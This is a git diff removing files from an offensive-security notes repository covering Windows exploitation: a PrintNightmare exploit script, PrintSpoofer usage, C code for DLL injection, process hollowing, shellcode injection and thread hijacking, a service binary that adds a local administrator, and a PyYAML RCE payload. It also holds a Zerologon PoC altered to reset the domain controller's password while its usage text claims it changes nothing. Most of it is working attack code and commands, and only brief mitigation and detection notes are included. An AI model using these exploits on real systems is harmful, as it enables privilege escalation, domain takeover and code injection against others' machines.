-        "cannot be found, it will use the ones specified in the command "
-        "line",
-    )
-    parser.add_argument(
-        "-dc-ip",
-        action="store",
-        metavar="ip address",
-        help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter",
-    )
-
-    group = parser.add_argument_group("driver")
-    group.add_argument(
-        "-name",
-        action="store",
-        metavar="driver name",
-        default="Microsoft XPS Document Writer v5",
-        help="Name for driver",
-    )
-    group.add_argument(
-        "-env",
-        action="store",
-        metavar="driver name",
-        default="Windows x64",
-        help="Environment for driver",
-    )
-    group.add_argument(
-        "-path", action="store", metavar="driver path", help="Driver path for driver"
-    )
-    group.add_argument("-dll", action="store", metavar="driver dll", help="Path to DLL")
-
-    group = parser.add_argument_group("modes")
-    group.add_argument(
-        "-check", action="store_true", help="Check if target is vulnerable"
-    )
-    group.add_argument(
-        "-list",
-        action="store_true",
-        help="List existing printer drivers",
-    )
-    group.add_argument("-delete", action="store_true", help="Deletes printer driver")
-
-    if len(sys.argv) == 1:
-        parser.print_help()
-        sys.exit(1)
-
-    options = parser.parse_args()
-
-    if options.debug is True:
-        logging.getLogger().setLevel(logging.DEBUG)
-    else:
-        logging.getLogger().setLevel(logging.INFO)
-
-    domain, username, password, remote_name = parse_target(options.target)
-
-    if domain is None:
-        domain = ""
-
-    if (
-        password == ""
-        and username != ""
-        and options.hashes is None
-        and options.no_pass is not True
-    ):
-        from getpass import getpass
-
-        password = getpass("Password:")
-
-    if options.target_ip is None:
-        options.target_ip = remote_name
-
-    if options.path is None:
-        options.path = ""
-
-    print_nightmare = PrintNightmare(
-        username=username,
-        password=password,
-        domain=domain,
-        hashes=options.hashes,
-        do_kerberos=options.k,
-        dc_host=options.dc_ip,
-        port=int(options.port),
-        remote_name=remote_name,
-        target_ip=options.target_ip,
-    )
-
-    if options.check is not False:
-        if print_nightmare.check():
-            logging.info("Target appears to be vulnerable!")
-        else:
-            logging.warning("Target does not appear to be vulnerable")
-        sys.exit(1)
-
-    if options.list is not False:
-        for driver in print_nightmare.list(options.env):
-            print("Name:               %s" % driver["Name"])
-            print("Environment:        %s" % driver["Environment"])
-            print("Driver path:        %s" % driver["DriverPath"])
-            print("Data file:          %s" % driver["DataFile"])
-            print("Config file:        %s" % driver["ConfigFile"])
-            print("Version:            %s" % driver["cVersion"])
-            print("-" * 64)
-        sys.exit(1)
-
-    if options.delete is not False:
-        print_nightmare.delete(options.env, options.name)
-        sys.exit(1)
-
-    if options.dll is None:
-        logging.error("A path to a DLL is required when running the exploit")
-        sys.exit(1)
-
-    print_nightmare.exploit(options.name, options.env, options.path, options.dll)
diff --git a/exploit/windows/print_nightmare/print_nightmare.md b/exploit/windows/print_nightmare/print_nightmare.md
deleted file mode 100644
index 2c5d5b2..0000000
--- a/exploit/windows/print_nightmare/print_nightmare.md
+++ /dev/null
@@ -1,54 +0,0 @@
-# Print Nightmare
-
-* Privilege Escalation using Print Spooler Service 
-* Located at `C:\Windows\System32\spoolsv.exe` 
-* Enabled by default
-* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
-* RCE connection is done via [DCE/RPC](https://wiki.wireshark.org/DCE/RPC). Use of `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`
-
-## Usage
-
-* Prepare reverse shell
-* Check if target would be vulnerable
-```sh
-rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
-```
-* Execute smb server
-```sh
-smbserver.py share . -smb2support
-```
-* Execute PoC with credentials to elevate
-```sh
-python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
-```
-* Use the meterpreter session
-
-### Mimikatz
-
-* Printnightmare modules of mimikatz
-```sh
-misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll
-```
-
-## IOCs
-
-* `pcAddPrinterDriverEx()` is called
-* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them
-* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)
-
-* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
-* Event Ids `316, 808, 811, 31017, 7031`
-
-## Mitigation
-
-* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
-* Stop and disable
-```sh
-Stop-Service -Name Spooler -Force
-Set-Service -Name Spooler -StartupType Disabled
-```
-* Disable group policy
-```sh
-Computer Configuration/Administrative Templates/Printers
-```
-
diff --git a/exploit/windows/print_nightmare/printspoofer/PrintSpoofer.exe b/exploit/windows/print_nightmare/printspoofer/PrintSpoofer.exe
deleted file mode 100644
index 8d93ec7..0000000
Binary files a/exploit/windows/print_nightmare/printspoofer/PrintSpoofer.exe and /dev/null differ
diff --git a/exploit/windows/print_nightmare/printspoofer/README.md b/exploit/windows/print_nightmare/printspoofer/README.md
deleted file mode 100644
index fe3de3c..0000000
--- a/exploit/windows/print_nightmare/printspoofer/README.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# printspoofer
-
-PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.  
-
-To escalate privileges, the service account must have SeImpersonate privileges.  To execute:
-
-```bash
-PrintSpoofer.exe -i -c cmd
-```
-With appropriate privileges this should grant system user shell access.
diff --git a/exploit/windows/process_injection/dll_injection.md b/exploit/windows/process_injection/dll_injection.md
deleted file mode 100644
index 5a59af0..0000000
--- a/exploit/windows/process_injection/dll_injection.md
+++ /dev/null
@@ -1,81 +0,0 @@
-# DLL Injection
-
-```c
-DWORD getProcessId(const char *processName) {
-    HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
-			TH32CS_SNAPPROCESS, // Include all processes residing on the system
-			0 // Indicates the current process
-		);
-    if (hSnapshot) {
-        PROCESSENTRY32 entry; // Adds a pointer to the PROCESSENTRY32 structure
-        entry.dwSize = sizeof(PROCESSENTRY32); // Obtains the byte size of the structure
-        if (Process32First( // Obtains the first process in the snapshot
-					hSnapshot, // Handle of the snapshot
-					&entry // Pointer to the PROCESSENTRY32 structure
-				)) {
-            do {
-                if (!strcmp( // Compares two strings to determine if the process name matches
-									entry.szExeFile, // Executable file name of the current process from PROCESSENTRY32
-									processName // Supplied process name
-								)) { 
-                    return entry.th32ProcessID; // Process ID of matched process
-                }
-            } while (Process32Next( // Obtains the next process in the snapshot
-							hSnapshot, // Handle of the snapshot
-							&entry
-						)); // Pointer to the PROCESSENTRY32 structure
-        }
-    }
-
-DWORD processId = getProcessId(processName); // Stores the enumerated process ID
-```
-
-* Open Process
-```c
-HANDLE hProcess = OpenProcess(
-	PROCESS_ALL_ACCESS, // Requests all possible access rights
-	FALSE, // Child processes do not inheret parent process handle
-	processId // Stored process ID
-);
-```
-
-* Allocate memory
-```c
-LPVOID dllAllocatedMemory = VirtualAllocEx(
-	hProcess, // Handle for the target process
-	NULL, 
-	strlen(dllLibFullPath), // Size of the DLL path
-	MEM_RESERVE | MEM_COMMIT, // Reserves and commits pages
-	PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
-);
-```
-
-* Write to memory
-```c
-WriteProcessMemory(
-	hProcess, // Handle for the target process
-	dllAllocatedMemory, // Allocated memory region
-	dllLibFullPath, // Path to the malicious DLL
-	strlen(dllLibFullPath) + 1, // Byte size of the malicious DLL
-	NULL
-);
-```
-
-```c
-
-LPVOID loadLibrary = (LPVOID) GetProcAddress(
-	GetModuleHandle("kernel32.dll"), // Handle of the module containing the call
-	"LoadLibraryA" // API call to import
-);
-HANDLE remoteThreadHandler = CreateRemoteThread(
-	hProcess, // Handle for the target process
-	NULL, 
-	0, // Default size from the execuatable of the stack
-	(LPTHREAD_START_ROUTINE) loadLibrary, pointer to the starting function
-	dllAllocatedMemory, // pointer to the allocated memory region
-	0, // Runs immediately after creation
-	NULL
-);
-```
-
-
diff --git a/exploit/windows/process_injection/process_hollowing.md b/exploit/windows/process_injection/process_hollowing.md
deleted file mode 100644
index dc71bb8..0000000
--- a/exploit/windows/process_injection/process_hollowing.md
+++ /dev/null
@@ -1,156 +0,0 @@
-# Process Hollowing
-
-* Target process which is in suspended state has to be created
-```c
-LPSTARTUPINFOA target_si = new STARTUPINFOA(); // Defines station, desktop, handles, and appearance of a process
-LPPROCESS_INFORMATION target_pi = new PROCESS_INFORMATION(); // Information about the process and primary thread
-CONTEXT c; // Context structure pointer
-
-if (CreateProcessA(
-	(LPSTR)"C:\\\\Windows\\\\System32\\\\svchost.exe", // Name of module to execute
-	NULL,
-	NULL,
-	NULL,
-	TRUE, // Handles are inherited from the calling process
-	CREATE_SUSPENDED, // New process is suspended
-	NULL,
-	NULL,
-	target_si, // pointer to startup info
-	target_pi) == 0) { // pointer to process information
-	cout << "[!] Failed to create Target process. Last Error: " << GetLastError();
-	return 1;
-```
-
-* Malicious image has to be opened
-```c
-HANDLE hMaliciousCode = CreateFileA(
-	(LPCSTR)"C:\\\\Users\\\\tryhackme\\\\malware.exe", // Name of image
-	GENERIC_READ, // Read-only access
-	FILE_SHARE_READ, // Read-only share mode
-	NULL,
-	OPEN_EXISTING, // Instructed to open a file or device if it exists
-	NULL,
-	NULL
-);
-```
-
-* Unmap memory from the process 
-```c
-c.ContextFlags = CONTEXT_INTEGER; // Only stores CPU registers in the pointer
-GetThreadContext(
-	target_pi->hThread, // Handle to the thread obtained from the PROCESS_INFORMATION structure
-	&c // Pointer to store retrieved context
-); // Obtains the current thread context
-
-PVOID pTargetImageBaseAddress; 
-ReadProcessMemory(
-	target_pi->hProcess, // Handle for the process obtained from the PROCESS_INFORMATION structure
-	(PVOID)(c.Ebx + 8), // Pointer to the base address
-	&pTargetImageBaseAddress, // Store target base address 
-	sizeof(PVOID), // Bytes to read 
-	0 // Number of bytes out
-);
-```
-
-* Allocate and write into the memory unmapped
-```c
-DWORD maliciousFileSize = GetFileSize(
-	hMaliciousCode, // Handle of malicious image
-	0 // Returns no error
-);
-
-PVOID pMaliciousImage = VirtualAlloc(
-	NULL,
-	maliciousFileSize, // File size of malicious image
-	0x3000, // Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)
-	0x04 // Enables read/write access (PAGE_READWRITE)
-);
-```
-```c
-DWORD numberOfBytesRead; // Stores number of bytes read
-
-if (!ReadFile(
-	hMaliciousCode, // Handle of malicious image
-	pMaliciousImage, // Allocated region of memory
-	maliciousFileSize, // File size of malicious image
-	&numberOfBytesRead, // Number of bytes read
-	NULL
-	)) {
-	cout << "[!] Unable to read Malicious file into memory. Error: " <<GetLastError()<< endl;
-	TerminateProcess(target_pi->hProcess, 0);
-	return 1;
-}
-
-CloseHandle(hMaliciousCode);
-```
-* Get handle of dll
-```c
-HMODULE hNtdllBase = GetModuleHandleA("ntdll.dll"); // Obtains the handle for ntdll
-pfnZwUnmapViewOfSection pZwUnmapViewOfSection = (pfnZwUnmapViewOfSection)GetProcAddress(
-	hNtdllBase, // Handle of ntdll
-	"ZwUnmapViewOfSection" // API call to obtain
-); // Obtains ZwUnmapViewOfSection from ntdll
-
-DWORD dwResult = pZwUnmapViewOfSection(
-	target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
-	pTargetImageBaseAddress // Base address of the process
-);
-```
-
-* Allocate memory for the target process
-```c
-PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)pMaliciousImage; // Obtains the DOS header from the malicious image
-PIMAGE_NT_HEADERS pNTHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)pMaliciousImage + pDOSHeader->e_lfanew); // Obtains the NT header from e_lfanew
-
-DWORD sizeOfMaliciousImage = pNTHeaders->OptionalHeader.SizeOfImage; // Obtains the size of the optional header from the NT header structure
-
-PVOID pHollowAddress = VirtualAllocEx(
-	target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
-	pTargetImageBaseAddress, // Base address of the process
-	sizeOfMaliciousImage, // Byte size obtained from optional header
-	0x3000, // Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)
-	0x40 // Enabled execute and read/write access (PAGE_EXECUTE_READWRITE)
-);
-```
-
-* Write to the process memory
-```c
-if (!WriteProcessMemory(
-	target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
-	pTargetImageBaseAddress, // Base address of the process
-	pMaliciousImage, // Local memory where the malicious file resides
-	pNTHeaders->OptionalHeader.SizeOfHeaders, // Byte size of PE headers 
-	NULL
-)) {
-	cout<< "[!] Writting Headers failed. Error: " << GetLastError() << endl;
-}
-```
-```c
-for (int i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++) { // Loop based on number of sections in PE data
-	PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((LPBYTE)pMaliciousImage + pDOSHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER))); // Determines the current PE section header
-
-	WriteProcessMemory(
-		target_pi->hProcess, // Handle of the process obtained from the PROCESS_INFORMATION structure
-		(PVOID)((LPBYTE)pHollowAddress + pSectionHeader->VirtualAddress), // Base address of current section 
-		(PVOID)((LPBYTE)pMaliciousImage + pSectionHeader->PointerToRawData), // Pointer for content of current section
-		pSectionHeader->SizeOfRawData, // Byte size of current section
-		NULL
-	);
-}
-```
-
-* Set entrypoint
-```c
-c.Eax = (SIZE_T)((LPBYTE)pHollowAddress + pNTHeaders->OptionalHeader.AddressOfEntryPoint); // Set the context structure pointer to the entry point from the PE optional header
-
-SetThreadContext(
-	target_pi->hThread, // Handle to the thread obtained from the PROCESS_INFORMATION structure
-	&c // Pointer to the stored context structure
-);
-```
-* Switch process state to running
-```c
-ResumeThread(
-	target_pi->hThread // Handle to the thread obtained from the PROCESS_INFORMATION structure
-);
-```
diff --git a/exploit/windows/process_injection/shellcode_injection.md b/exploit/windows/process_injection/shellcode_injection.md
deleted file mode 100644
index 9ced0b9..0000000
--- a/exploit/windows/process_injection/shellcode_injection.md
+++ /dev/null
@@ -1,55 +0,0 @@
-# Process Injection
-
-## Shellcode injection
-
-* Open a process
-```sh
-processHandle = OpenProcess(
-	PROCESS_ALL_ACCESS, // Defines access rights
-	FALSE, // Target handle will not be inhereted
-	DWORD(atoi(argv[1])) // Local process supplied by command-line arguments 
-);
-```
-
-* Allocate memory
-```sh
-remoteBuffer = VirtualAllocEx(
-	processHandle, // Opened target process
-	NULL, 
-	sizeof shellcode, // Region size of memory allocation
-	(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
-	PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
-);
-```
-
-* Write shellcode to memory allocated
-```sh
-WriteProcessMemory(
-	processHandle, // Opened target process
-	remoteBuffer, // Allocated memory region
-	shellcode, // Data to write
-	sizeof shellcode, // byte size of data
-	NULL
-);
-```
-
-* Execute shellcode inside a created thread
-```sh
-remoteThread = CreateRemoteThread(
-	processHandle, // Opened target process
-	NULL, 
-	0, // Default size of the stack
-	(LPTHREAD_START_ROUTINE)remoteBuffer, // Pointer to the starting address of the thread
-	NULL, 
-	0, // Ran immediately after creation
-	NULL
-);
-```
-
-* Compile
-* Check processes via
-```sh
-Get-Process -IncludeUserName
-```
-* Run on process ID as argv1
-
diff --git a/exploit/windows/process_injection/thread_hijacking.md b/exploit/windows/process_injection/thread_hijacking.md
deleted file mode 100644
index 539c46e..0000000
--- a/exploit/windows/process_injection/thread_hijacking.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# Thread Hijacking
-
-* Open process, allocate and write memory
-```c
-HANDLE hProcess = OpenProcess(
-	PROCESS_ALL_ACCESS, // Requests all possible access rights
-	FALSE, // Child processes do not inheret parent process handle
-	processId // Stored process ID
-);
-PVOIF remoteBuffer = VirtualAllocEx(
-	hProcess, // Opened target process
-	NULL, 
-	sizeof shellcode, // Region size of memory allocation
-	(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
-	PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
-);
-WriteProcessMemory(
-	processHandle, // Opened target process
-	remoteBuffer, // Allocated memory region
-	shellcode, // Data to write
-	sizeof shellcode, // byte size of data
-	NULL
-);
-```
-
-* Snapshot the process and get the first thread
-```c
-THREADENTRY32 threadEntry;
-
-HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
-	TH32CS_SNAPTHREAD, // Include all processes residing on the system
-	0 // Indicates the current process
-);
-Thread32First( // Obtains the first thread in the snapshot
-	hSnapshot, // Handle of the snapshot
-	&threadEntry // Pointer to the THREADENTRY32 structure
-);
-
-while (Thread32Next( // Obtains the next thread in the snapshot
-	snapshot, // Handle of the snapshot
-	&threadEntry // Pointer to the THREADENTRY32 structure
-)) {
-```
-
-* Get Pointer to the thread
-```c
-if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
-		{
-			HANDLE hThread = OpenThread(
-				THREAD_ALL_ACCESS, // Requests all possible access rights
-				FALSE, // Child threads do not inheret parent thread handle
-				threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
-			);
-			break;
-		}
-```
-
-* Suspend threat ,get context and change `$rip`
-```
-SuspendThread(hThread);
-CONTEXT context;
-GetThreadContext(
-	hThread, // Handle for the thread 
-	&context // Pointer to store the context structure
-);
-context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
-```
-
-* Set context and resume the thread
-```c
-SetThreadContext(
-	hThread, // Handle for the thread 
-	&context // Pointer to the context structure
-);
-ResumeThread(
-	hThread // Handle for the thread
-);
-```
-
diff --git a/exploit/windows/service_escalation/service.c b/exploit/windows/service_escalation/service.c
deleted file mode 100644
index 9e23ce6..0000000
--- a/exploit/windows/service_escalation/service.c
+++ /dev/null
@@ -1,76 +0,0 @@
-#include <windows.h>
-#include <stdio.h>
-
-#define SLEEP_TIME 5000
-
-SERVICE_STATUS ServiceStatus;
-SERVICE_STATUS_HANDLE hStatus;
-
-void ServiceMain(int argc, char** argv);
-void ControlHandler(DWORD request);
-
-//add the payload here
-int Run()
-{
-    system("cmd.exe /k net localgroup administrators user /add");
-    return 0;
-}
-
-int main()
-{
-    SERVICE_TABLE_ENTRY ServiceTable[2];
-    ServiceTable[0].lpServiceName = "MyService";
-    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
-
-    ServiceTable[1].lpServiceName = NULL;
-    ServiceTable[1].lpServiceProc = NULL;
-
-    StartServiceCtrlDispatcher(ServiceTable);
-    return 0;
-}
-
-void ServiceMain(int argc, char** argv)
-{
-    ServiceStatus.dwServiceType        = SERVICE_WIN32;
-    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING;
-    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-    ServiceStatus.dwWin32ExitCode      = 0;
-    ServiceStatus.dwServiceSpecificExitCode = 0;
-    ServiceStatus.dwCheckPoint         = 0;
-    ServiceStatus.dwWaitHint           = 0;
-
-    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
-    Run();
-
-    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
-    SetServiceStatus (hStatus, &ServiceStatus);
-
-    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
-    {
-                Sleep(SLEEP_TIME);
-    }
-    return;
-}
-
-void ControlHandler(DWORD request)
-{
-    switch(request)
-    {
-        case SERVICE_CONTROL_STOP:
-                        ServiceStatus.dwWin32ExitCode = 0;
-            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
-            SetServiceStatus (hStatus, &ServiceStatus);
-            return;
-
-        case SERVICE_CONTROL_SHUTDOWN:
-            ServiceStatus.dwWin32ExitCode = 0;
-            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
-            SetServiceStatus (hStatus, &ServiceStatus);
-            return;
-
-        default:
-            break;
-    }
-    SetServiceStatus (hStatus,  &ServiceStatus);
-    return;
-}
diff --git a/exploit/windows/service_escalation/service_escalation.md b/exploit/windows/service_escalation/service_escalation.md
deleted file mode 100644
index 8c1e996..0000000
--- a/exploit/windows/service_escalation/service_escalation.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Service Escalation
-
-* Check service control permission 
-```sh
-Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
-```
-* Add command to system() function inside `service.c`, e.g. add user to administrators group
-```sh
-cmd.exe /k net localgroup administrators user /add
-```
-* Compile via  
-```sh
-x86_64-w64-mingw32-gcc service.c service.exe
-```
-* Upload to target and
-```sh
-reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
-sc start regsvc
-```
diff --git a/exploit/windows/windows-kernel-exploits b/exploit/windows/windows-kernel-exploits
deleted file mode 160000
index 2b944b5..0000000
--- a/exploit/windows/windows-kernel-exploits
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 2b944b52ee30f8833a21f0805d2627ca1f15383a
diff --git a/exploit/windows/zero_logon/zero_logon.md b/exploit/windows/zero_logon/zero_logon.md
deleted file mode 100644
index c103d9d..0000000
--- a/exploit/windows/zero_logon/zero_logon.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# Zero Logon 
-
-[CVE-2020-1472](http://cve.circl.lu/cve/CVE-2020-1472)
-
-##  MS-NRPC (Microsoft NetLogon Remote Protocol) 
-* ComputeNetlogonCredential
-* IV is `0` of AES-CFB8
-* Machine accounts got no limit on failed login attempts (64 bit alnum password)
-
-## Kill Chain
-Zero Logon to bypass authentication on the Domain Controller's Machine Account -> Run `Secretsdump.py` to dump credentials -> Crack/Pass Domain Admin Hashes -> ??? -> Profit
-
-## MS-NRPC Logon
-* Netlogon handshake between Client (domain-joined computer) and Server (domain-controller).
-* RPC traffic
-```mermaid
-sequenceDiagram
-    participant Client
-    participant Server
-Client ->> Server: Client challenge
-Server ->> Client: Server challenge, Session Key = KDF(secret, challenges)
-Client ->> Server: Client credential, Encrypt(K_sess, client challenge)
-Server ->> Client: Client credential, Encrypt(K_sess, client challenge)
-Client ->> Server: Signed + sealed with session key: Procedure call with authenticator
-```
-
-* Zero Logon attack. Zeroing parameters and retrying handshakes with an empty password on the domain controller.
-```mermaid
-sequenceDiagram
-    participant Client
-    participant Server
-Client ->> Server: NetrServerReqChallenge (challenge=0000...00)
-Server ->> Client: Server Challenge
-Client ->> Server: NetrServerAuthenticate3 (identity=DC; credential=0000...00; sign/seal=0)
-Server ->> Client: OK
-Client ->> Server: NetrServerPasswordSet2 (target=DC; authenticator=0000...00; timestamp=0; enc.password=0000...00)
-```
-
-1. Client sends 16 Bytes of `0` as Nonce to domain-controller
-2. Server receives NetServerReqChallenge and generates challenge (Nonce). Sends it to the client.
-3. __NetrServerAuthenticate3__ method is generated as NetLogon credentials. Contains the following
-    1. __Custom Binding Handle__ 
-    2. __Account Name__
-    3. __Secure Channel Type__, nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
-    4. __Computer Name__, Domain Controller DC01
-    5. __Client Credential String__, 16 Bytes of `\x00`
-    6. __Negotiation Flags__, value observed from a Win10 client with Sign/Seal flags disabled: 0x212fffff Provided by Secura
-
-4. NetrServerAuthenticate is received by server. Responds success if positive to the client.
-5. If same values is calculated by the server, mutual agreement is confirmed by the client as well.
-
-## PoC
-* [Secura's PoC](https://github.com/SecuraBV/CVE-2020-1472) 
-* [NetrServerPasswordSet2](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81)
-* [NetServerAuthenticate3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9)
-* [Authenticator](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/76c93227-942a-4687-ab9d-9d972ffabdab)
-* [NETLOGON_CREDENTIALS](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/d55e2632-7163-4f6c-b662-4b870e8cc1cd)
diff --git a/exploit/windows/zero_logon/zero_logon_PoC.py b/exploit/windows/zero_logon/zero_logon_PoC.py
deleted file mode 100644
index fb9c232..0000000
--- a/exploit/windows/zero_logon/zero_logon_PoC.py
+++ /dev/null
@@ -1,100 +0,0 @@
-#!/usr/bin/env python3
-
-from impacket.dcerpc.v5 import nrpc, epm
-from impacket.dcerpc.v5.dtypes import NULL
-from impacket.dcerpc.v5 import transport
-from impacket import crypto
-
-import hmac, hashlib, struct, sys, socket, time
-from binascii import hexlify, unhexlify
-from subprocess import check_call
-
-# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
-MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
-
-def fail(msg):
-  print(msg, file=sys.stderr)
-  print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
-  sys.exit(2)
-
-def try_zero_authenticate(dc_handle, dc_ip, target_computer):
-  # Connect to the DC's Netlogon service.
-  binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
-  rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
-  rpc_con.connect()
-  rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
-
-  # Use an all-zero challenge and credential.
-  plaintext = b'\x00' * 8
-  ciphertext = b'\x00' * 8
-
-  # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. 
-  flags = 0x212fffff
-
-  # Send challenge and authentication request.
-  nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
-  try:
-    server_auth = nrpc.hNetrServerAuthenticate3(
-      rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
-      target_computer + '\x00', ciphertext, flags
-    )
-
-    
-    # It worked!
-    assert server_auth['ErrorCode'] == 0
-    # ADDED BY mnemonic_daemon
-    #
-    newPassRequest = nrpc.NetrServerPasswordSet2()
-    newPassRequest['PrimaryName'] = dc_handle + '\x00'
-    newPassRequest['AccountName'] = target_computer + '$\x00'
-    newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
-    auth = nrpc.NETLOGON_AUTHENTICATOR()
-    auth['Credential'] = b'\x00' * 8
-    auth['Timestamp'] = 0
-    newPassRequest['Authenticator'] = auth
-    newPassRequest['ComputerName'] = target_computer + '\x00'
-    newPassRequest['ClearNewPassword'] =  b'\x00' * 516
-    rpc_con.request(newPassRequest)
-    return rpc_con
-
-  except nrpc.DCERPCSessionError as ex:
-    # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
-    if ex.get_error_code() == 0xc0000022:
-      return None
-    else:
-      fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
-  except BaseException as ex:
-    fail(f'Unexpected error: {ex}.')
-
-
-def perform_attack(dc_handle, dc_ip, target_computer):
-  # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
-  print('Performing authentication attempts...')
-  rpc_con = None
-  for attempt in range(0, MAX_ATTEMPTS):  
-    rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
-    
-    if rpc_con == None:
-      print('=', end='', flush=True)
-    else:
-      break
-
-  if rpc_con:
-    print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
-  else:
-    print('\nAttack failed. Target is probably patched.')
-    sys.exit(1)
-
-
-if __name__ == '__main__':
-  if not (3 <= len(sys.argv) <= 4):
-    print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
-    print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
-    print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
-    sys.exit(1)
-  else:
-    [_, dc_name, dc_ip] = sys.argv
-
-    dc_name = dc_name.rstrip('$')
-    perform_attack('\\\\' + dc_name, dc_ip, dc_name)
-
diff --git a/exploit/yaml/deserialization.md b/exploit/yaml/deserialization.md
deleted file mode 100644
index 4a3b281..0000000
--- a/exploit/yaml/deserialization.md
+++ /dev/null
@@ -1,13 +0,0 @@
-# YAML Deserialization
-
-* [CVE-2019-20477](https://packetstormsecurity.com/files/cve/CVE-2019-20477)
-* RCE via Yaml execution by Python
-
-* [jolt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
-
-## Usage
-
-* Example Payload insid foo.yaml gets executed via Python
-```sh
-!!python/object/apply:os.system ["id"]
-```